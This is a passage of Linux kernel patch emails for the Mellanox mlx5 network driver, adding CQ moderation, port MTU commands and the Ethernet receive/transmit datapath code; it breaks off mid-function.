May 2015 22:28:44 +0300 Subject: [PATCH 498/872] net/mlx5_core: Modify CQ moderation parameters Introduce mlx5_core_modify_cq_moderation() to be used by the netdev, to set hardware coalescing. Signed-off-by: Rana Shahout Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/cq.c | 18 ++++++++++++++++++ include/linux/mlx5/cq.h | 3 +++ 2 files changed, 21 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cq.c b/drivers/net/ethernet/mellanox/mlx5/core/cq.c index eb0cf81f5f45..04ab7e445eae 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/cq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/cq.c @@ -219,6 +219,24 @@ int mlx5_core_modify_cq(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq, } EXPORT_SYMBOL(mlx5_core_modify_cq); +int mlx5_core_modify_cq_moderation(struct mlx5_core_dev *dev, + struct mlx5_core_cq *cq, + u16 cq_period, + u16 cq_max_count) +{ + struct mlx5_modify_cq_mbox_in in; + + memset(&in, 0, sizeof(in)); + + in.cqn = cpu_to_be32(cq->cqn); + in.ctx.cq_period = cpu_to_be16(cq_period); + in.ctx.cq_max_count = cpu_to_be16(cq_max_count); + in.field_select = cpu_to_be32(MLX5_CQ_MODIFY_PERIOD | + MLX5_CQ_MODIFY_COUNT); + + return mlx5_core_modify_cq(dev, cq, &in, sizeof(in)); +} + int mlx5_init_cq_table(struct mlx5_core_dev *dev) { struct mlx5_cq_table *table = &dev->priv.cq_table; diff --git a/include/linux/mlx5/cq.h b/include/linux/mlx5/cq.h index 2695ced222df..abc4767695e4 100644 --- a/include/linux/mlx5/cq.h +++ b/include/linux/mlx5/cq.h @@ -169,6 +169,9 @@ int mlx5_core_query_cq(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq, struct mlx5_query_cq_mbox_out *out); int mlx5_core_modify_cq(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq, struct mlx5_modify_cq_mbox_in *in, int in_sz); +int mlx5_core_modify_cq_moderation(struct mlx5_core_dev *dev, + struct mlx5_core_cq *cq, u16 cq_period, + u16 cq_max_count); int mlx5_debug_cq_add(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq); void mlx5_debug_cq_remove(struct mlx5_core_dev *dev, struct mlx5_core_cq *cq); From e725440e75da8c4d617a31c4e38216acc55c24e3 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:45 +0300 Subject: [PATCH 499/872] net/mlx5_core: Set/Query port MTU commands Introduce set/Query low level functions to access MTU in hardware. To be used by the netdev. Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. 
Miller --- .../net/ethernet/mellanox/mlx5/core/port.c | 53 +++++++++++++++++++ include/linux/mlx5/driver.h | 4 ++ 2 files changed, 57 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index 742a6fb8debe..7d3d0f9f328d 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -211,3 +211,56 @@ int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status) *status = MLX5_GET(paos_reg, out, oper_status); return err; } + +static int mlx5_query_port_mtu(struct mlx5_core_dev *dev, + int *admin_mtu, int *max_mtu, int *oper_mtu) +{ + u32 in[MLX5_ST_SZ_DW(pmtu_reg)]; + u32 out[MLX5_ST_SZ_DW(pmtu_reg)]; + int err; + + memset(in, 0, sizeof(in)); + + MLX5_SET(pmtu_reg, in, local_port, 1); + + err = mlx5_core_access_reg(dev, in, sizeof(in), out, + sizeof(out), MLX5_REG_PMTU, 0, 0); + if (err) + return err; + + if (max_mtu) + *max_mtu = MLX5_GET(pmtu_reg, out, max_mtu); + if (oper_mtu) + *oper_mtu = MLX5_GET(pmtu_reg, out, oper_mtu); + if (admin_mtu) + *admin_mtu = MLX5_GET(pmtu_reg, out, admin_mtu); + + return 0; +} + +int mlx5_set_port_mtu(struct mlx5_core_dev *dev, int mtu) +{ + u32 in[MLX5_ST_SZ_DW(pmtu_reg)]; + u32 out[MLX5_ST_SZ_DW(pmtu_reg)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(pmtu_reg, in, admin_mtu, mtu); + MLX5_SET(pmtu_reg, in, local_port, 1); + + return mlx5_core_access_reg(dev, in, sizeof(in), out, sizeof(out), + MLX5_REG_PMTU, 0, 1); +} +EXPORT_SYMBOL_GPL(mlx5_set_port_mtu); + +int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu) +{ + return mlx5_query_port_mtu(dev, NULL, max_mtu, NULL); +} +EXPORT_SYMBOL_GPL(mlx5_query_port_max_mtu); + +int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu) +{ + return mlx5_query_port_mtu(dev, NULL, NULL, oper_mtu); +} +EXPORT_SYMBOL_GPL(mlx5_query_port_oper_mtu); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 6438444ab361..51738472657e 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -710,6 +710,10 @@ int mlx5_set_port_status(struct mlx5_core_dev *dev, enum mlx5_port_status status); int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status); +int mlx5_set_port_mtu(struct mlx5_core_dev *dev, int mtu); +int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu); +int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu); + int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); int mlx5_core_eq_query(struct mlx5_core_dev *dev, struct mlx5_eq *eq, From e586b3b0baee89f4998efd9cc97001c63e3bc744 Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 28 May 2015 22:28:46 +0300 Subject: [PATCH 500/872] net/mlx5: Ethernet Datapath files en_[rt]x.c contains the data path related code specific to tx or rx. en_txrx.c contains data path code which is common for both the rx and tx, this is mainly napi related code. Below are the objects that are being used by the hardware and the driver in the data path: Channel - one channel per IRQ. Every channel object contains: RQ - describes the rx queue TIR - One TIR (Transport Interface Receive) object per flow type. TIR contains attributes for a type of rx flow (e.g IPv4, IPv6 etc). A flow is defined in the Flow Table. Currently TIR describes the RSS hash parameters if exists and LRO attributes. SQ - describes the a tx queue. There is one SQ (Send Queue) per TC (traffic class). 
TIS - There is one TIS (Transport Interface Send) per TC. It describes the TC and may later be extended to describe more transport properties. Both RQ and SQ inherit from the object WQ (work queue). This common code to describe the layout of CQE's WQE's in memory is in the files wq.[cj] For every channel there is one NAPI context that is used for RX and for TX. Driver is using netdev_alloc_skb() to allocate skb's. Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/en_rx.c | 249 +++++++++++++ .../net/ethernet/mellanox/mlx5/core/en_tx.c | 344 ++++++++++++++++++ .../net/ethernet/mellanox/mlx5/core/en_txrx.c | 107 ++++++ drivers/net/ethernet/mellanox/mlx5/core/wq.c | 183 ++++++++++ drivers/net/ethernet/mellanox/mlx5/core/wq.h | 171 +++++++++ 5 files changed, 1054 insertions(+) create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_rx.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_tx.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/wq.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/wq.h diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c new file mode 100644 index 000000000000..ce1317cdabd7 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c @@ -0,0 +1,249 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +#include +#include +#include +#include "en.h" + +static inline int mlx5e_alloc_rx_wqe(struct mlx5e_rq *rq, + struct mlx5e_rx_wqe *wqe, u16 ix) +{ + struct sk_buff *skb; + dma_addr_t dma_addr; + + skb = netdev_alloc_skb(rq->netdev, rq->wqe_sz); + if (unlikely(!skb)) + return -ENOMEM; + + skb_reserve(skb, MLX5E_NET_IP_ALIGN); + + dma_addr = dma_map_single(rq->pdev, + /* hw start padding */ + skb->data - MLX5E_NET_IP_ALIGN, + /* hw end padding */ + rq->wqe_sz, + DMA_FROM_DEVICE); + + if (unlikely(dma_mapping_error(rq->pdev, dma_addr))) + goto err_free_skb; + + *((dma_addr_t *)skb->cb) = dma_addr; + wqe->data.addr = cpu_to_be64(dma_addr + MLX5E_NET_IP_ALIGN); + + rq->skb[ix] = skb; + + return 0; + +err_free_skb: + dev_kfree_skb(skb); + + return -ENOMEM; +} + +bool mlx5e_post_rx_wqes(struct mlx5e_rq *rq) +{ + struct mlx5_wq_ll *wq = &rq->wq; + + if (unlikely(!test_bit(MLX5E_RQ_STATE_POST_WQES_ENABLE, &rq->state))) + return false; + + while (!mlx5_wq_ll_is_full(wq)) { + struct mlx5e_rx_wqe *wqe = mlx5_wq_ll_get_wqe(wq, wq->head); + + if (unlikely(mlx5e_alloc_rx_wqe(rq, wqe, wq->head))) + break; + + mlx5_wq_ll_push(wq, be16_to_cpu(wqe->next.next_wqe_index)); + } + + /* ensure wqes are visible to device before updating doorbell record */ + dma_wmb(); + + mlx5_wq_ll_update_db_record(wq); + + return !mlx5_wq_ll_is_full(wq); +} + +static void mlx5e_lro_update_hdr(struct sk_buff *skb, struct mlx5_cqe64 *cqe) +{ + struct ethhdr *eth = (struct ethhdr *)(skb->data); + struct iphdr *ipv4 = (struct iphdr *)(skb->data + ETH_HLEN); + struct ipv6hdr *ipv6 = (struct ipv6hdr *)(skb->data + ETH_HLEN); + struct tcphdr *tcp; + + u8 l4_hdr_type = get_cqe_l4_hdr_type(cqe); + int tcp_ack = ((CQE_L4_HDR_TYPE_TCP_ACK_NO_DATA == l4_hdr_type) || + (CQE_L4_HDR_TYPE_TCP_ACK_AND_DATA == l4_hdr_type)); + + u16 tot_len = be32_to_cpu(cqe->byte_cnt) - ETH_HLEN; + + if (eth->h_proto == htons(ETH_P_IP)) { + tcp = (struct tcphdr *)(skb->data + ETH_HLEN + + sizeof(struct iphdr)); + ipv6 = NULL; + } else { + tcp = (struct tcphdr *)(skb->data + ETH_HLEN + + sizeof(struct ipv6hdr)); + ipv4 = NULL; + } + + if (get_cqe_lro_tcppsh(cqe)) + tcp->psh = 1; + + if (tcp_ack) { + tcp->ack = 1; + tcp->ack_seq = cqe->lro_ack_seq_num; + tcp->window = cqe->lro_tcp_win; + } + + if (ipv4) { + ipv4->ttl = cqe->lro_min_ttl; + ipv4->tot_len = cpu_to_be16(tot_len); + ipv4->check = 0; + ipv4->check = ip_fast_csum((unsigned char *)ipv4, + ipv4->ihl); + } else { + ipv6->hop_limit = cqe->lro_min_ttl; + ipv6->payload_len = cpu_to_be16(tot_len - + sizeof(struct ipv6hdr)); + } +} + +static inline void mlx5e_skb_set_hash(struct mlx5_cqe64 *cqe, + struct sk_buff *skb) +{ + u8 cht = cqe->rss_hash_type; + int ht = (cht & CQE_RSS_HTYPE_L4) ? PKT_HASH_TYPE_L4 : + (cht & CQE_RSS_HTYPE_IP) ? 
PKT_HASH_TYPE_L3 : + PKT_HASH_TYPE_NONE; + skb_set_hash(skb, be32_to_cpu(cqe->rss_hash_result), ht); +} + +static inline void mlx5e_build_rx_skb(struct mlx5_cqe64 *cqe, + struct mlx5e_rq *rq, + struct sk_buff *skb) +{ + struct net_device *netdev = rq->netdev; + u32 cqe_bcnt = be32_to_cpu(cqe->byte_cnt); + int lro_num_seg; + + skb_put(skb, cqe_bcnt); + + lro_num_seg = be32_to_cpu(cqe->srqn) >> 24; + if (lro_num_seg > 1) { + mlx5e_lro_update_hdr(skb, cqe); + skb_shinfo(skb)->gso_size = MLX5E_PARAMS_DEFAULT_LRO_WQE_SZ; + rq->stats.lro_packets++; + rq->stats.lro_bytes += cqe_bcnt; + } + + if (likely(netdev->features & NETIF_F_RXCSUM) && + (cqe->hds_ip_ext & CQE_L2_OK) && + (cqe->hds_ip_ext & CQE_L3_OK) && + (cqe->hds_ip_ext & CQE_L4_OK)) { + skb->ip_summed = CHECKSUM_UNNECESSARY; + } else { + skb->ip_summed = CHECKSUM_NONE; + rq->stats.csum_none++; + } + + skb->protocol = eth_type_trans(skb, netdev); + + skb_record_rx_queue(skb, rq->ix); + + if (likely(netdev->features & NETIF_F_RXHASH)) + mlx5e_skb_set_hash(cqe, skb); + + if (cqe_has_vlan(cqe)) + __vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q), + be16_to_cpu(cqe->vlan_info)); +} + +bool mlx5e_poll_rx_cq(struct mlx5e_cq *cq, int budget) +{ + struct mlx5e_rq *rq = cq->sqrq; + int i; + + /* avoid accessing cq (dma coherent memory) if not needed */ + if (!test_and_clear_bit(MLX5E_CQ_HAS_CQES, &cq->flags)) + return false; + + for (i = 0; i < budget; i++) { + struct mlx5e_rx_wqe *wqe; + struct mlx5_cqe64 *cqe; + struct sk_buff *skb; + __be16 wqe_counter_be; + u16 wqe_counter; + + cqe = mlx5e_get_cqe(cq); + if (!cqe) + break; + + wqe_counter_be = cqe->wqe_counter; + wqe_counter = be16_to_cpu(wqe_counter_be); + wqe = mlx5_wq_ll_get_wqe(&rq->wq, wqe_counter); + skb = rq->skb[wqe_counter]; + rq->skb[wqe_counter] = NULL; + + dma_unmap_single(rq->pdev, + *((dma_addr_t *)skb->cb), + skb_end_offset(skb), + DMA_FROM_DEVICE); + + if (unlikely((cqe->op_own >> 4) != MLX5_CQE_RESP_SEND)) { + rq->stats.wqe_err++; + dev_kfree_skb(skb); + goto wq_ll_pop; + } + + mlx5e_build_rx_skb(cqe, rq, skb); + rq->stats.packets++; + napi_gro_receive(cq->napi, skb); + +wq_ll_pop: + mlx5_wq_ll_pop(&rq->wq, wqe_counter_be, + &wqe->next.next_wqe_index); + } + + mlx5_cqwq_update_db_record(&cq->wq); + + /* ensure cq space is freed before enabling more cqes */ + wmb(); + + if (i == budget) { + set_bit(MLX5E_CQ_HAS_CQES, &cq->flags); + return true; + } + + return false; +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c new file mode 100644 index 000000000000..8020986cdaf6 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c @@ -0,0 +1,344 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. 
+ * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include +#include "en.h" + +static void mlx5e_dma_pop_last_pushed(struct mlx5e_sq *sq, dma_addr_t *addr, + u32 *size) +{ + sq->dma_fifo_pc--; + *addr = sq->dma_fifo[sq->dma_fifo_pc & sq->dma_fifo_mask].addr; + *size = sq->dma_fifo[sq->dma_fifo_pc & sq->dma_fifo_mask].size; +} + +static void mlx5e_dma_unmap_wqe_err(struct mlx5e_sq *sq, struct sk_buff *skb) +{ + dma_addr_t addr; + u32 size; + int i; + + for (i = 0; i < MLX5E_TX_SKB_CB(skb)->num_dma; i++) { + mlx5e_dma_pop_last_pushed(sq, &addr, &size); + dma_unmap_single(sq->pdev, addr, size, DMA_TO_DEVICE); + } +} + +static inline void mlx5e_dma_push(struct mlx5e_sq *sq, dma_addr_t addr, + u32 size) +{ + sq->dma_fifo[sq->dma_fifo_pc & sq->dma_fifo_mask].addr = addr; + sq->dma_fifo[sq->dma_fifo_pc & sq->dma_fifo_mask].size = size; + sq->dma_fifo_pc++; +} + +static inline void mlx5e_dma_get(struct mlx5e_sq *sq, u32 i, dma_addr_t *addr, + u32 *size) +{ + *addr = sq->dma_fifo[i & sq->dma_fifo_mask].addr; + *size = sq->dma_fifo[i & sq->dma_fifo_mask].size; +} + +u16 mlx5e_select_queue(struct net_device *dev, struct sk_buff *skb, + void *accel_priv, select_queue_fallback_t fallback) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int channel_ix = fallback(dev, skb); + int up = skb_vlan_tag_present(skb) ? 
+ skb->vlan_tci >> VLAN_PRIO_SHIFT : + priv->default_vlan_prio; + int tc = netdev_get_prio_tc_map(dev, up); + + return (tc << priv->order_base_2_num_channels) | channel_ix; +} + +static inline u16 mlx5e_get_inline_hdr_size(struct mlx5e_sq *sq, + struct sk_buff *skb) +{ +#define MLX5E_MIN_INLINE 16 /* eth header with vlan (w/o next ethertype) */ + return MLX5E_MIN_INLINE; +} + +static inline void mlx5e_insert_vlan(void *start, struct sk_buff *skb, u16 ihs) +{ + struct vlan_ethhdr *vhdr = (struct vlan_ethhdr *)start; + int cpy1_sz = 2 * ETH_ALEN; + int cpy2_sz = ihs - cpy1_sz - VLAN_HLEN; + + skb_copy_from_linear_data(skb, vhdr, cpy1_sz); + skb_pull_inline(skb, cpy1_sz); + vhdr->h_vlan_proto = skb->vlan_proto; + vhdr->h_vlan_TCI = cpu_to_be16(skb_vlan_tag_get(skb)); + skb_copy_from_linear_data(skb, &vhdr->h_vlan_encapsulated_proto, + cpy2_sz); + skb_pull_inline(skb, cpy2_sz); +} + +static netdev_tx_t mlx5e_sq_xmit(struct mlx5e_sq *sq, struct sk_buff *skb) +{ + struct mlx5_wq_cyc *wq = &sq->wq; + + u16 pi = sq->pc & wq->sz_m1; + struct mlx5e_tx_wqe *wqe = mlx5_wq_cyc_get_wqe(wq, pi); + + struct mlx5_wqe_ctrl_seg *cseg = &wqe->ctrl; + struct mlx5_wqe_eth_seg *eseg = &wqe->eth; + struct mlx5_wqe_data_seg *dseg; + + u8 opcode = MLX5_OPCODE_SEND; + dma_addr_t dma_addr = 0; + u16 headlen; + u16 ds_cnt; + u16 ihs; + int i; + + memset(wqe, 0, sizeof(*wqe)); + + if (likely(skb->ip_summed == CHECKSUM_PARTIAL)) + eseg->cs_flags = MLX5_ETH_WQE_L3_CSUM | MLX5_ETH_WQE_L4_CSUM; + else + sq->stats.csum_offload_none++; + + if (skb_is_gso(skb)) { + u32 payload_len; + int num_pkts; + + eseg->mss = cpu_to_be16(skb_shinfo(skb)->gso_size); + opcode = MLX5_OPCODE_LSO; + ihs = skb_transport_offset(skb) + tcp_hdrlen(skb); + payload_len = skb->len - ihs; + num_pkts = (payload_len / skb_shinfo(skb)->gso_size) + + !!(payload_len % skb_shinfo(skb)->gso_size); + MLX5E_TX_SKB_CB(skb)->num_bytes = skb->len + + (num_pkts - 1) * ihs; + sq->stats.tso_packets++; + sq->stats.tso_bytes += payload_len; + } else { + ihs = mlx5e_get_inline_hdr_size(sq, skb); + MLX5E_TX_SKB_CB(skb)->num_bytes = max_t(unsigned int, skb->len, + ETH_ZLEN); + } + + if (skb_vlan_tag_present(skb)) { + mlx5e_insert_vlan(eseg->inline_hdr_start, skb, ihs); + } else { + skb_copy_from_linear_data(skb, eseg->inline_hdr_start, ihs); + skb_pull_inline(skb, ihs); + } + + eseg->inline_hdr_sz = cpu_to_be16(ihs); + + ds_cnt = sizeof(*wqe) / MLX5_SEND_WQE_DS; + ds_cnt += DIV_ROUND_UP(ihs - sizeof(eseg->inline_hdr_start), + MLX5_SEND_WQE_DS); + dseg = (struct mlx5_wqe_data_seg *)cseg + ds_cnt; + + MLX5E_TX_SKB_CB(skb)->num_dma = 0; + + headlen = skb_headlen(skb); + if (headlen) { + dma_addr = dma_map_single(sq->pdev, skb->data, headlen, + DMA_TO_DEVICE); + if (unlikely(dma_mapping_error(sq->pdev, dma_addr))) + goto dma_unmap_wqe_err; + + dseg->addr = cpu_to_be64(dma_addr); + dseg->lkey = sq->mkey_be; + dseg->byte_count = cpu_to_be32(headlen); + + mlx5e_dma_push(sq, dma_addr, headlen); + MLX5E_TX_SKB_CB(skb)->num_dma++; + + dseg++; + } + + for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) { + struct skb_frag_struct *frag = &skb_shinfo(skb)->frags[i]; + int fsz = skb_frag_size(frag); + + dma_addr = skb_frag_dma_map(sq->pdev, frag, 0, fsz, + DMA_TO_DEVICE); + if (unlikely(dma_mapping_error(sq->pdev, dma_addr))) + goto dma_unmap_wqe_err; + + dseg->addr = cpu_to_be64(dma_addr); + dseg->lkey = sq->mkey_be; + dseg->byte_count = cpu_to_be32(fsz); + + mlx5e_dma_push(sq, dma_addr, fsz); + MLX5E_TX_SKB_CB(skb)->num_dma++; + + dseg++; + } + + ds_cnt += MLX5E_TX_SKB_CB(skb)->num_dma; 
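/*
 * At this point ds_cnt counts every 16-byte descriptor segment of the
 * WQE: the control and eth segments (sizeof(*wqe) / MLX5_SEND_WQE_DS),
 * the part of the inline header that spills past inline_hdr_start
 * (rounded up to MLX5_SEND_WQE_DS), and one data segment per DMA-mapped
 * buffer. The control segment filled in below packs the producer
 * counter and opcode into opmod_idx_opcode and the SQ number plus
 * ds_cnt into qpn_ds; num_wqebbs is ds_cnt rounded up to whole WQE
 * basic blocks, which is what advances sq->pc.
 */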
+ + cseg->opmod_idx_opcode = cpu_to_be32((sq->pc << 8) | opcode); + cseg->qpn_ds = cpu_to_be32((sq->sqn << 8) | ds_cnt); + cseg->fm_ce_se = MLX5_WQE_CTRL_CQ_UPDATE; + + sq->skb[pi] = skb; + + MLX5E_TX_SKB_CB(skb)->num_wqebbs = DIV_ROUND_UP(ds_cnt, + MLX5_SEND_WQEBB_NUM_DS); + sq->pc += MLX5E_TX_SKB_CB(skb)->num_wqebbs; + + netdev_tx_sent_queue(sq->txq, MLX5E_TX_SKB_CB(skb)->num_bytes); + + if (unlikely(!mlx5e_sq_has_room_for(sq, MLX5_SEND_WQE_MAX_WQEBBS))) { + netif_tx_stop_queue(sq->txq); + sq->stats.stopped++; + } + + if (!skb->xmit_more || netif_xmit_stopped(sq->txq)) + mlx5e_tx_notify_hw(sq, wqe); + + sq->stats.packets++; + return NETDEV_TX_OK; + +dma_unmap_wqe_err: + sq->stats.dropped++; + mlx5e_dma_unmap_wqe_err(sq, skb); + + dev_kfree_skb_any(skb); + + return NETDEV_TX_OK; +} + +netdev_tx_t mlx5e_xmit(struct sk_buff *skb, struct net_device *dev) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int ix = skb->queue_mapping; + int tc = 0; + struct mlx5e_channel *c = priv->channel[ix]; + struct mlx5e_sq *sq = &c->sq[tc]; + + return mlx5e_sq_xmit(sq, skb); +} + +netdev_tx_t mlx5e_xmit_multi_tc(struct sk_buff *skb, struct net_device *dev) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int ix = skb->queue_mapping & priv->queue_mapping_channel_mask; + int tc = skb->queue_mapping >> priv->order_base_2_num_channels; + struct mlx5e_channel *c = priv->channel[ix]; + struct mlx5e_sq *sq = &c->sq[tc]; + + return mlx5e_sq_xmit(sq, skb); +} + +bool mlx5e_poll_tx_cq(struct mlx5e_cq *cq) +{ + struct mlx5e_sq *sq; + u32 dma_fifo_cc; + u32 nbytes; + u16 npkts; + u16 sqcc; + int i; + + /* avoid accessing cq (dma coherent memory) if not needed */ + if (!test_and_clear_bit(MLX5E_CQ_HAS_CQES, &cq->flags)) + return false; + + sq = cq->sqrq; + + npkts = 0; + nbytes = 0; + + /* sq->cc must be updated only after mlx5_cqwq_update_db_record(), + * otherwise a cq overrun may occur + */ + sqcc = sq->cc; + + /* avoid dirtying sq cache line every cqe */ + dma_fifo_cc = sq->dma_fifo_cc; + + for (i = 0; i < MLX5E_TX_CQ_POLL_BUDGET; i++) { + struct mlx5_cqe64 *cqe; + struct sk_buff *skb; + u16 ci; + int j; + + cqe = mlx5e_get_cqe(cq); + if (!cqe) + break; + + ci = sqcc & sq->wq.sz_m1; + skb = sq->skb[ci]; + + if (unlikely(!skb)) { /* nop */ + sq->stats.nop++; + sqcc++; + goto free_skb; + } + + for (j = 0; j < MLX5E_TX_SKB_CB(skb)->num_dma; j++) { + dma_addr_t addr; + u32 size; + + mlx5e_dma_get(sq, dma_fifo_cc, &addr, &size); + dma_fifo_cc++; + dma_unmap_single(sq->pdev, addr, size, DMA_TO_DEVICE); + } + + npkts++; + nbytes += MLX5E_TX_SKB_CB(skb)->num_bytes; + sqcc += MLX5E_TX_SKB_CB(skb)->num_wqebbs; + +free_skb: + dev_kfree_skb(skb); + } + + mlx5_cqwq_update_db_record(&cq->wq); + + /* ensure cq space is freed before enabling more cqes */ + wmb(); + + sq->dma_fifo_cc = dma_fifo_cc; + sq->cc = sqcc; + + netdev_tx_completed_queue(sq->txq, npkts, nbytes); + + if (netif_tx_queue_stopped(sq->txq) && + mlx5e_sq_has_room_for(sq, MLX5_SEND_WQE_MAX_WQEBBS) && + likely(test_bit(MLX5E_SQ_STATE_WAKE_TXQ_ENABLE, &sq->state))) { + netif_tx_wake_queue(sq->txq); + sq->stats.wake++; + } + if (i == MLX5E_TX_CQ_POLL_BUDGET) { + set_bit(MLX5E_CQ_HAS_CQES, &cq->flags); + return true; + } + + return false; +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c new file mode 100644 index 000000000000..088bc424157c --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c @@ -0,0 +1,107 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. 
+ * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include "en.h" + +struct mlx5_cqe64 *mlx5e_get_cqe(struct mlx5e_cq *cq) +{ + struct mlx5_cqwq *wq = &cq->wq; + u32 ci = mlx5_cqwq_get_ci(wq); + struct mlx5_cqe64 *cqe = mlx5_cqwq_get_wqe(wq, ci); + int cqe_ownership_bit = cqe->op_own & MLX5_CQE_OWNER_MASK; + int sw_ownership_val = mlx5_cqwq_get_wrap_cnt(wq) & 1; + + if (cqe_ownership_bit != sw_ownership_val) + return NULL; + + mlx5_cqwq_pop(wq); + + /* ensure cqe content is read after cqe ownership bit */ + rmb(); + + return cqe; +} + +int mlx5e_napi_poll(struct napi_struct *napi, int budget) +{ + struct mlx5e_channel *c = container_of(napi, struct mlx5e_channel, + napi); + bool busy = false; + int i; + 